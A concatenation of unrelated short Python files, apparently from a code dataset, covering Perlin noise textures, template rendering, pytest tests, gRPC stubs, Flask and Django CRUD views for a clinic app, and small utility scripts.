q01 = self.getGradientIndex(qx1, qy0)
q10 = self.getGradientIndex(qx0, qy1)
q11 = self.getGradientIndex(qx1, qy1)
tx0 = x - math.floor(x)
tx1 = tx0 - 1
ty0 = y - math.floor(y)
ty1 = ty0 - 1
v00 = self.gradients[q00][0] * tx0 + self.gradients[q00][1] * ty0
v01 = self.gradients[q01][0] * tx1 + self.gradients[q01][1] * ty0
v10 = self.gradients[q10][0] * tx0 + self.gradients[q10][1] * ty1
v11 = self.gradients[q11][0] * tx1 + self.gradients[q11][1] * ty1
wx = tx0 * tx0 * (3 - 2 * tx0)
v0 = v00 + wx * (v01 - v00)
v1 = v10 + wx * (v11 - v10)
wy = ty0 * ty0 * (3 - 2 * ty0)
return (v0 + wy * (v1 - v0)) * 0.5 + 1
def makeTexture(self, canshu1,canshu2,canshu3,texture = None):
if texture is None:
texture = self.cloud
noise = {}
max = min = None
for i in range(self.imageLen):
for j in range(self.imageWid):
value = texture(i, j,canshu1,canshu2,canshu3,noise=None)
noise[i, j] = value
if max is None or max < value:
max = value
if min is None or min > value:
min = value
for i in range(self.imageLen):
for j in range(self.imageWid):
self.img[i, j] = (int) ((noise[i, j] - min) / (max - min) * 255 )
def fractalBrownianMotion(self, x, y, func,octaves,persistence,canshu):
# octaves = 12
amplitude = 1.0
frequency = 1.0 / self.imageWid
# persistence = 0.5
value = 0.0
for k in range(octaves):
value += func(x * frequency, y * frequency) * amplitude
frequency *= canshu
amplitude *= persistence
return value
def wood(self, x, y,canshu1,canshu2,canshu3, noise = None):
if noise is None:
noise = self.perlinNoise
frequency = 1.0 / self.imageWid
n = noise(canshu1 * x * frequency, canshu2 * y * frequency) * canshu3
return n - int(n)
|
nilq/baby-python
|
python
|
VERSION = '0.1.7'
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from io import StringIO
from dktemplate.parse import nest
from dktemplate.tokenize import tokenize
class Render(object):
def __init__(self, content):
self.content = content
self.out = StringIO()
self.curlevel = 0
def value(self):
return self.out.getvalue()
def render(self, item=None):
if item is None:
item = self.content[0]
tag = item[0]
if tag.startswith('block:'):
tag = 'block'
#print '[I]', item, 'CALLING:', getattr(self, 'render_' + tag).__name__ , item
try:
getattr(self, 'render_' + tag)(item)
except:
print('='*80)
print(self.out.getvalue())
raise
def render_block(self, block):
print("{%% %s %%}" % block[0], file=self.out)
if len(block) > 1:
for item in block[1]:
self.render(item)
print("{%% end%s %%}" % block[0], file=self.out)
def render_tag(self, tag):
print("{%% %s %%}" % (' '.join(tag[1:])), file=self.out)
def render_val(self, item):
print("{{ %s }}" % item[1], file=self.out)
def render(txt, fname=None):
item = [nest(tokenize(txt), fname)]
r = Render("")
r.render(item)
return r.value()
|
nilq/baby-python
|
python
|
def findDuplicate(string):
list =[]
for i in string:
if i not in list and string.count(i) > 1:
list.append(i)
return list
n=input('Enter String : ')
print('Duplicate characters :',findDuplicate(n))
|
nilq/baby-python
|
python
|
# Copyright 2020 Tyler Calder
import collections
import contextlib
import io
import unittest.mock
import os
import subprocess
import sys
import pytest
from pytest_mock import mocker
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import _realreq.realreq as realreq
CONTENT = """
import os
import requests
from foo import bar
from . import local_module
import local_module2
from foo.baz import frum
import abbrev
import src.local_module
"""
MOCK_ALIASES = {"abbrev": "abbreviation"}
realreq.ALIASES = MOCK_ALIASES
_MOCK_DEPENDENCY_TREE = {
"foo": ["bar"],
"requests": ["baz", "spam"],
"baz": [],
"spam": ["egg", "wheel"],
"egg": ["pip"],
"pip": [],
"wheel": [],
"abbreviation": [],
}
_MOCK_DEP_VERSIONS = {
"foo": "1.0.0",
"baz": "0.1.0",
"spam": "3.2.12",
"egg": "13.0",
"pip": "2.12.1",
"wheel": "1.1.1",
"notused": "201.10.1",
"DevDep": "0.1.1",
"testDep": "0.1.3",
"abbreviation": "1.2.1",
"requests": "0.2.0",
}
_DEEP_DEPENDENCIES = collections.OrderedDict(
[
("abbreviation", "1.2.1"),
("baz", "0.1.0"),
("egg", "13.0"),
("foo", "1.0.0"),
("pip", "2.12.1"),
("requests", "0.2.0"),
("spam", "3.2.12"),
("wheel", "1.1.1"),
]
)
_SHALLOW_DEPENDENCIES = collections.OrderedDict(
[
("abbreviation", "1.2.1"),
("foo", "1.0.0"),
("requests", "0.2.0"),
]
)
def mock_pip_show(*args, **kwargs):
pkg = args[0][2]
try:
deps = _MOCK_DEPENDENCY_TREE[pkg]
except KeyError:
raise subprocess.CalledProcessError(1, cmd="Test Command")
mock_result = unittest.mock.MagicMock()
mock_result.configure_mock(
**{
"stdout": "stuff\nRequires: {0}\nmore stuff".format(
", ".join(deps)
).encode()
}
)
return mock_result
def mock_pip_freeze(*args, **kwargs):
result = b"\n".join(
["{0}=={1}".format(k, v).encode() for k, v in _MOCK_DEP_VERSIONS.items()]
)
mock_result = unittest.mock.MagicMock()
mock_result.configure_mock(**{"stdout": result})
return mock_result
def mock_subprocess_run(*args, **kwargs):
"""Mock calls to subprocess by routing them to the right mock"""
command = args[0][1]
if command == "show":
return mock_pip_show(*args, **kwargs)
elif command == "freeze":
return mock_pip_freeze(*args, **kwargs)
@pytest.fixture(scope="session", params=["src", "path/to/src"])
def source_files(
tmp_path_factory,
request,
):
"""Creates a temp directory that tests different source files
returns: path to directory being used for test
"""
path = os.path.normpath(request.param)
paths = path.split("/")
if len(paths) > 1 and isinstance(paths, list):
src = tmp_path_factory.mktemp(path[0], numbered=False)
for p in paths:
src = src / p
src.mkdir()
else:
src = tmp_path_factory.mktemp(path, numbered=False)
main = src / "main.py"
main.write_text(CONTENT)
return src
def test_search_source_for_used_packages(source_files):
"""Source code is searched and aquires the name of all packages used"""
pkgs = realreq._search_source(str(source_files))
expected = [
"requests",
"foo",
"local_module2",
"abbreviation",
]
assert set(pkgs) == set(expected)
def test_build_dependency_list(mocker):
"""Dependency Tree build out should identify all the dependencies a module has"""
# Essentially we want to make sure that the values returned from the system
# are what we would get by running `pip show x`, and then getting the "Requires" value
mock_run = mocker.patch("subprocess.run")
mock_run.side_effect = mock_pip_show
pkgs = ["requests", "foo", "local_module2", "abbreviation"]
dep_tree = realreq._build_dep_list(pkgs)
assert all([_ in dep_tree for _ in list(_MOCK_DEPENDENCY_TREE.keys())])
def test_get_dependency_versions(mocker):
"""Dependency Versions should return dictionary with packages and versions"""
mock_run = mocker.patch("subprocess.run")
mock_run.side_effect = mock_pip_freeze
pkgs = _MOCK_DEPENDENCY_TREE.keys()
versions = realreq._get_dependency_versions(pkgs)
assert versions == {
"foo": "1.0.0",
"baz": "0.1.0",
"spam": "3.2.12",
"egg": "13.0",
"pip": "2.12.1",
"wheel": "1.1.1",
"abbreviation": "1.2.1",
"requests": "0.2.0",
}
class TestCLI:
"""Tests for the CLI of realreq"""
@pytest.mark.parametrize("s_flag", ["-s", "--source"])
def test_default_flags(self, source_files, mocker, s_flag):
args = ["cmd", s_flag, str(source_files)]
mocker.patch.object(sys, "argv", args)
mock_run = mocker.patch("subprocess.run")
mock_run.side_effect = mock_subprocess_run
sbuff = io.StringIO()
with contextlib.redirect_stdout(sbuff):
app = realreq._RealReq()
app()
sbuff.seek(0)
assert sbuff.read() == "".join(
"{0}=={1}\n".format(k, v) for k, v in _SHALLOW_DEPENDENCIES.items()
)
@pytest.mark.parametrize("s_flag", ["-s", "--source"])
@pytest.mark.parametrize("d_flag", ["-d", "--deep"])
def test_deep_flag(self, source_files, mocker, s_flag, d_flag):
args = ["cmd", s_flag, str(source_files), d_flag]
mocker.patch.object(sys, "argv", args)
mock_run = mocker.patch("subprocess.run")
mock_run.side_effect = mock_subprocess_run
sbuff = io.StringIO()
with contextlib.redirect_stdout(sbuff):
app = realreq._RealReq()
app()
sbuff.seek(0)
assert sbuff.read() == "".join(
"{0}=={1}\n".format(k, v) for k, v in _DEEP_DEPENDENCIES.items()
)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
'''
@Description: 工具
@Author: Zpp
@Date: 2019-10-28 11:28:09
LastEditors: Zpp
LastEditTime: 2020-11-24 16:27:50
'''
import platform
def IsWindows():
return True if platform.system() == 'Windows' else False
def ReadFile(path, type='r'):
try:
f = open(path, type)
content = f.read()
f.close()
return content
except:
return False
def WriteFile(path, content, type='w'):
try:
f = open(path, type)
f.write(content)
f.close()
return True
except:
return False
def health_database_status(s, sql):
is_db = True
try:
s.execute(sql)
except:
is_db = False
return is_db
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import pytest
import time
import zwutils.dlso as dlso
# pylint: disable=no-member
def test_dict2obj():
r = dlso.dict2obj({
'ks': 'v1',
'kn': 2,
'ka': [1, '2'],
'kd': {'1':1, '2':2},
'knone': None
})
r2 = dlso.dict2obj(None)
assert r.ks == 'v1'
def test_obj2dict():
o = type('', (), {})()
o.a1 = 'a'
o.a2 = 'b'
r = dlso.obj2dict(o)
assert r['a1'] == 'a'
def test_extend_attr():
b = {'a':'a', 'b':'b'}
e = {'b':'bb', 'c':'c', 'd':1}
o = dlso.extend_attrs(dlso.dict2obj(b), e)
assert o.b == 'bb' and o.c == 'c' and o.d == 1
o = dlso.extend_attrs(b, e)
assert o.b == 'bb' and o.c == 'c' and o.d == 1
o = dlso.extend_attrs(dlso.dict2obj(b), dlso.dict2obj(e))
assert o.b == 'bb' and o.c == 'c' and o.d == 1
o = dlso.extend_attrs(None, e)
assert o.b == 'bb' and o.c == 'c' and o.d == 1
o = dlso.extend_attrs(dlso.dict2obj(b), None)
assert o.a == 'a' and o.b == 'b'
def test_update_attrs():
b = {'a':'a', 'b':'b'}
e = {'b':'bb', 'c':'c'}
o = dlso.update_attrs(dlso.dict2obj(b), e)
assert o.b == 'bb' and not hasattr(o, 'c')
o = dlso.update_attrs(b, e)
assert o.b == 'bb' and not hasattr(o, 'c')
o = dlso.update_attrs(dlso.dict2obj(b), dlso.dict2obj(e))
assert o.b == 'bb' and not hasattr(o, 'c')
o = dlso.update_attrs(None, e)
assert not hasattr(o, 'b') and not hasattr(o, 'c')
o = dlso.update_attrs(dlso.dict2obj(b), None)
assert o.a == 'a' and o.b == 'b'
def test_upsert_config():
pcfg = type('', (), {})()
pcfg.a = 'o'
dcfg = {'a': 'd', 'da':'da', 'n1':{'nn1': {'nnn1': 'nnn1'}, 'nn2': 'nn2' } }
ncfg = {'a': 'n', 'na':'na'}
pmcfg = {'a': 'p','pa':'pa'}
cfg = dlso.upsert_config(pcfg, dcfg, ncfg, pmcfg)
assert id(cfg) == id(pcfg) and cfg.a == 'p' and hasattr(cfg, 'pa') and cfg.n1.nn1.nnn1 == 'nnn1'
def test_list_split():
r = dlso.list_split(list(range(11)), 3)
assert len(r) == 3
r = dlso.list_split(list(range(5)), 6)
assert len(r) == 5
def test_list_compare():
assert False == dlso.list_compare([1,2,3,3], [1,2,2,3])
assert True == dlso.list_compare([1,2,3], [2,1,3])
|
nilq/baby-python
|
python
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import environment.grpc.jobshop_pb2 as jobshop__pb2
class EnvironmentStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ApplyAction = channel.unary_unary(
'/env.Environment/ApplyAction',
request_serializer=jobshop__pb2.MasAction.SerializeToString,
response_deserializer=jobshop__pb2.MasActionResponse.FromString,
)
self.Reset = channel.unary_unary(
'/env.Environment/Reset',
request_serializer=jobshop__pb2.Empty.SerializeToString,
response_deserializer=jobshop__pb2.MasState.FromString,
)
self.Render = channel.unary_unary(
'/env.Environment/Render',
request_serializer=jobshop__pb2.Empty.SerializeToString,
response_deserializer=jobshop__pb2.Empty.FromString,
)
self.SetSeed = channel.unary_unary(
'/env.Environment/SetSeed',
request_serializer=jobshop__pb2.Seed.SerializeToString,
response_deserializer=jobshop__pb2.Empty.FromString,
)
self.Setup = channel.unary_unary(
'/env.Environment/Setup',
request_serializer=jobshop__pb2.SettingsMsg.SerializeToString,
response_deserializer=jobshop__pb2.SetupMsg.FromString,
)
class EnvironmentServicer(object):
"""Missing associated documentation comment in .proto file"""
def ApplyAction(self, request, context):
"""Apply an action to all agents
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Reset(self, request, context):
"""Reset the environment
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Render(self, request, context):
"""Show GUI
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetSeed(self, request, context):
"""Set the env seed
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Setup(self, request, context):
"""Set and get Settings
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_EnvironmentServicer_to_server(servicer, server):
rpc_method_handlers = {
'ApplyAction': grpc.unary_unary_rpc_method_handler(
servicer.ApplyAction,
request_deserializer=jobshop__pb2.MasAction.FromString,
response_serializer=jobshop__pb2.MasActionResponse.SerializeToString,
),
'Reset': grpc.unary_unary_rpc_method_handler(
servicer.Reset,
request_deserializer=jobshop__pb2.Empty.FromString,
response_serializer=jobshop__pb2.MasState.SerializeToString,
),
'Render': grpc.unary_unary_rpc_method_handler(
servicer.Render,
request_deserializer=jobshop__pb2.Empty.FromString,
response_serializer=jobshop__pb2.Empty.SerializeToString,
),
'SetSeed': grpc.unary_unary_rpc_method_handler(
servicer.SetSeed,
request_deserializer=jobshop__pb2.Seed.FromString,
response_serializer=jobshop__pb2.Empty.SerializeToString,
),
'Setup': grpc.unary_unary_rpc_method_handler(
servicer.Setup,
request_deserializer=jobshop__pb2.SettingsMsg.FromString,
response_serializer=jobshop__pb2.SetupMsg.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'env.Environment', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Environment(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def ApplyAction(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/ApplyAction',
jobshop__pb2.MasAction.SerializeToString,
jobshop__pb2.MasActionResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Reset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/Reset',
jobshop__pb2.Empty.SerializeToString,
jobshop__pb2.MasState.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Render(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/Render',
jobshop__pb2.Empty.SerializeToString,
jobshop__pb2.Empty.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetSeed(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/SetSeed',
jobshop__pb2.Seed.SerializeToString,
jobshop__pb2.Empty.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Setup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/Setup',
jobshop__pb2.SettingsMsg.SerializeToString,
jobshop__pb2.SetupMsg.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
|
nilq/baby-python
|
python
|
import os
class Config:
"""
Parent configuration class.
"""
DEBUG = False
TESTING = False
CSRF_ENABLED = True
SECRET = os.getenv('SECRET')
TITLE = "Test API"
VERSION = "1.0"
DESCRIPTION = "Demo API."
|
nilq/baby-python
|
python
|
# coding=utf-8
from app.api.base.base_router import BaseRouter
from app.config.config import HEADER
from app.api.src.geo.provider import Provider
class GeoTypesRoute(BaseRouter):
def __init__(self):
super().__init__()
def get(self):
answer = Provider().get_types()
return answer, HEADER
def options(self):
return "OK", 200, {'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET,POST,DELETE,PUT,OPTIONS',
'Access-Control-Allow-Headers': 'X-Requested-With,Content-Type'}
|
nilq/baby-python
|
python
|
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.views.generic import ListView, DetailView
from django.views.generic.edit import UpdateView, DeleteView, CreateView
from django.urls import reverse_lazy
from .forms import *
from django.db.models import Q
class FuncaoListView(ListView):
model = Funcao
template_name = 'funcao/funcao_list.html'
context_object_name = "funcoes"
paginate_by = 10
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = Funcao.objects.filter(
Q(nome_funcao__icontains=query) | Q(cbo__icontains=query)
)
else:
object_list = Funcao.objects.all()
return object_list
class FuncaoDetailView(DetailView):
model = Funcao
template_name = 'funcao/detail.html'
class FuncaoCreateView(SuccessMessageMixin, CreateView):
form_class = FuncaoForm
template_name = 'funcao/create.html'
success_url = reverse_lazy('public:funcao_create')
success_message = "Função cadastrada com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class FuncaoUpdateView(SuccessMessageMixin, UpdateView):
model = Funcao
form_class = FuncaoForm
template_name = 'funcao/edit.html'
success_url = reverse_lazy('public:funcao_list')
success_message = "Função Editada com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class FuncaoDeleteView(SuccessMessageMixin, DeleteView):
model = Funcao
template_name = 'funcao/delete.html'
success_url = reverse_lazy('public:funcao_list')
success_message = "A função %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_funcao) #obs: antes era obj.__dict__ impria o objeto inteiro
return super(FuncaoDeleteView, self).delete(request, *args, **kwargs)
################################################## EMPRESA ####################################################
class EmpresaListView(ListView):
model = Empresa
template_name = 'empresa/empresa_list.html'
context_object_name = "empresas"
paginate_by = 10
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = Empresa.objects.filter(
Q(nome_empresa__icontains=query) | Q(cnpj__icontains=query)
)
else:
object_list = Empresa.objects.all()
return object_list
class EmpresaCreateView(SuccessMessageMixin, CreateView):
form_class = EmpresaForm
template_name = 'empresa/create.html'
success_url = reverse_lazy('public:empresa_create')
success_message = "Empresa cadastrada com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class EmpresaDetailView(DetailView):
model = Empresa
template_name = 'empresa/detail.html'
class EmpresaUpdateView(SuccessMessageMixin, UpdateView):
model = Empresa
form_class = EmpresaForm
template_name = 'empresa/edit.html'
success_url = reverse_lazy('public:empresa_list')
success_message = "Empresa Editada com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class EmpresaDeleteView(SuccessMessageMixin, DeleteView):
model = Empresa
template_name = 'empresa/delete.html'
success_url = reverse_lazy('public:empresa_list')
success_message = "A Empresa %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_empresa) #obs: antes era obj.__dict__ impria o objeto inteiro
return super(EmpresaDeleteView, self).delete(request, *args, **kwargs)
################################################## PACIENTE ####################################################
class PacienteListView(ListView):
model = Paciente
template_name = 'paciente/paciente_list.html'
context_object_name = "pacientes"
paginate_by = 10
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = Paciente.objects.filter(
Q(nome_paciente__icontains=query) | Q(cpf__icontains=query)
)
else:
object_list = Paciente.objects.all()
return object_list
class PacienteCreateView(SuccessMessageMixin, CreateView):
form_class = PacienteForm
template_name = 'paciente/create.html'
success_url = reverse_lazy('public:paciente_create')
success_message = "Paciente cadastrado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class PacienteDetailView(DetailView):
model = Paciente
template_name = 'paciente/detail.html'
class PacienteUpdateView(SuccessMessageMixin, UpdateView):
model = Paciente
form_class = PacienteForm
template_name = 'paciente/edit.html'
success_url = reverse_lazy('public:paciente_list')
success_message = "Paciente Editado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class PacienteDeleteView(SuccessMessageMixin, DeleteView):
model = Paciente
template_name = 'paciente/delete.html'
success_url = reverse_lazy('public:paciente_list')
success_message ="O Paciente %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_paciente) #obs: antes era obj.__dict__ impria o objeto inteiro
return super(PacienteDeleteView, self).delete(request, *args, **kwargs)
################################################## exame ####################################################
class ExameListView(ListView):
model = Exame
template_name = 'exame/exame_list.html'
context_object_name = "exames"
paginate_by = 10
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = Exame.objects.filter(
Q(nome_exame__icontains=query)
)
else:
object_list = Exame.objects.all()
return object_list
class ExameCreateView(SuccessMessageMixin, CreateView):
form_class = ExameForm
template_name = 'exame/create.html'
success_url = reverse_lazy('public:exame_create')
success_message = "Exame cadastrado com sucesso!"
# def moeda(valor):
# print(valor)
# valor = valor.replace('.', '')
# valor = valor.replace(',', '.')
# return Decimal(valor)
# return valor
def form_valid(self, form):
# print('aki 2')
# self.valor_colaborador = 6.0
#self.valor_ems = 12.00
self.object = form.save(commit=False)
# print(self.object.valor_colaborador)
# self.object.valor_exame = ExameCreateView.moeda(self.object.valor_colaborador)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class ExameDetailView(DetailView):
model = Exame
template_name = 'exame/detail.html'
class ExameUpdateView(SuccessMessageMixin, UpdateView):
model = Exame
form_class = ExameForm
template_name = 'exame/edit.html'
success_url = reverse_lazy('public:exame_list')
success_message = "Exame Editado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class ExameDeleteView(SuccessMessageMixin, DeleteView):
model = Exame
template_name = 'exame/delete.html'
success_url = reverse_lazy('public:exame_list')
success_message ="O Exame %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_exame) #obs: antes era obj.__dict__ impria o objeto inteiro
return super(PacienteDeleteView, self).delete(request, *args, **kwargs)
################################################## ESPECIALIDADE MEDICA ####################################################
class EspecialidadeMedicaListView(ListView):
model = EspecialidadeMedica
template_name = 'especialidademedica/especialidademedica_list.html'
context_object_name = "especialidademedicas"
paginate_by = 5
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = EspecialidadeMedica.objects.filter(
Q(especialidade_medica__icontains=query)
)
else:
object_list = EspecialidadeMedica.objects.all()
return object_list
class EspecialidadeMedicaCreateView(SuccessMessageMixin, CreateView):
form_class = EspecialiadeMedicaForm
template_name = 'especialidademedica/create.html'
success_url = reverse_lazy('public:especialidademedica_create')
success_message = "Especialidade Medica cadastrado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class EspecialidadeMedicaDetailView(DetailView):
model = EspecialidadeMedica
template_name = 'especialidademedica/detail.html'
class EspecialidadeMedicaUpdateView(SuccessMessageMixin, UpdateView):
model = EspecialidadeMedica
form_class = EspecialiadeMedicaForm
template_name = 'especialidademedica/edit.html'
success_url = reverse_lazy('public:especialidademedica_list')
success_message = "Especialidade Medica Editado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class EspecialidadeMedicaDeleteView(SuccessMessageMixin, DeleteView):
model = EspecialidadeMedica
template_name = 'especialidademedica/delete.html'
success_url = reverse_lazy('public:especialidademedica_list')
success_message ="A Especialidade Medica %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.especialidade_medica) #obs: antes era obj.__dict__ impria o objeto inteiro
return super(EspecialidadeMedicaDeleteView, self).delete(request, *args, **kwargs)
################################################## PRESTADOR DE SERVIÇO ####################################################
class PrestadorServicoListView(ListView):
model = PrestadorServico
template_name = 'prestadorservico/prestadorservico_list.html'
context_object_name = "prestadorservicos"
paginate_by = 5
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = PrestadorServico.objects.filter(
Q(nome_prestador__icontains=query)
)
else:
object_list = PrestadorServico.objects.all()
return object_list
class PrestadorServicoCreateView(SuccessMessageMixin, CreateView):
form_class = PrestadorServicoForm
template_name = 'prestadorservico/create.html'
success_url = reverse_lazy('public:prestadorservico_create')
success_message = "Prestador Serviço cadastrado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class PrestadorServicoDetailView(DetailView):
model = PrestadorServico
template_name = 'prestadorservico/detail.html'
class PrestadorServicoUpdateView(SuccessMessageMixin, UpdateView):
model = PrestadorServico
form_class = PrestadorServicoForm
template_name = 'prestadorservico/edit.html'
success_url = reverse_lazy('public:prestadorservico_list')
success_message = "Prestador de Serviço Editado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message) # obs: antes era obj.__dict__ impria o objeto inteiro
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class PrestadorServicoDeleteView(SuccessMessageMixin, DeleteView):
model = PrestadorServico
template_name = 'prestadorservico/delete.html'
success_url = reverse_lazy('public:prestadorservico_list')
success_message ="O Prestador de Serviço %s foi apagado com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_prestador) #obs: antes era obj.__dict__ impria o objeto inteiro
return super(PrestadorServicoDeleteView, self).delete(request, *args, **kwargs)
|
nilq/baby-python
|
python
|
nome = str(input("Qual é seu nome")).lower().strip()
if nome == "gustavo":
print("Que nome bonito")
elif nome == "pedro" or nome == "maria" or nome == "joão":
print ("O seu nome é bem popular")
elif nome == "ana katarina":
print ("que nome feio")
else:
print("Seu nome é bem chato")
|
nilq/baby-python
|
python
|
from .jsonexporter import JSONExporter
from .ymlexporter import YMLExporter
|
nilq/baby-python
|
python
|
from __future__ import absolute_import, division, print_function, unicode_literals
import math
import random
import time
from echomesh.sound import Level
from echomesh.util.registry.Registry import Registry
class _SystemFunction(object):
def __init__(self, function, is_constant):
self.function = function
self.is_constant = is_constant
_REGISTRY = Registry('System functions')
def register(name, function, is_constant):
_REGISTRY.register(_SystemFunction(function, is_constant), name)
register('e', math.e, True)
register('level', Level.input_level, False)
register('pi', math.pi, True)
register('random', random.random, False)
register('time', time.time, False)
get = _REGISTRY.get
|
nilq/baby-python
|
python
|
print('=====QUANTO DE TINTA?=====')
alt = float(input('Qual a altura da parede?'))
lar = float(input('Qual a largura da parede?'))
area = alt*lar
print('A área da parede é de {:.2f}m²!'.format(area))
print('Serão necessários {} litros de tinta para pintar a parede'.format(area/2))
|
nilq/baby-python
|
python
|
#########################################################################
# #
# C R A N F I E L D U N I V E R S I T Y #
# 2 0 1 9 / 2 0 2 0 #
# #
# MSc in Aerospace Computational Engineering #
# #
# Group Design Project #
# #
# Driver File for the OpenFoam Automated Tool Chain #
# Flow Past Cylinder Test Case #
# #
#-----------------------------------------------------------------------#
# #
# Main Contributors: #
# Vadim Maltsev (Email: V.Maltsev@cranfield.ac.uk) #
# Samali Liyanage (Email: Samali.Liyanage@cranfield.ac.uk) #
# Elias Farah (Email: E.Farah@cranfield.ac.uk) #
# Supervisor: #
# Dr. Tom-Robin Teschner (Email: Tom.Teschner@cranfield.ac.uk ) #
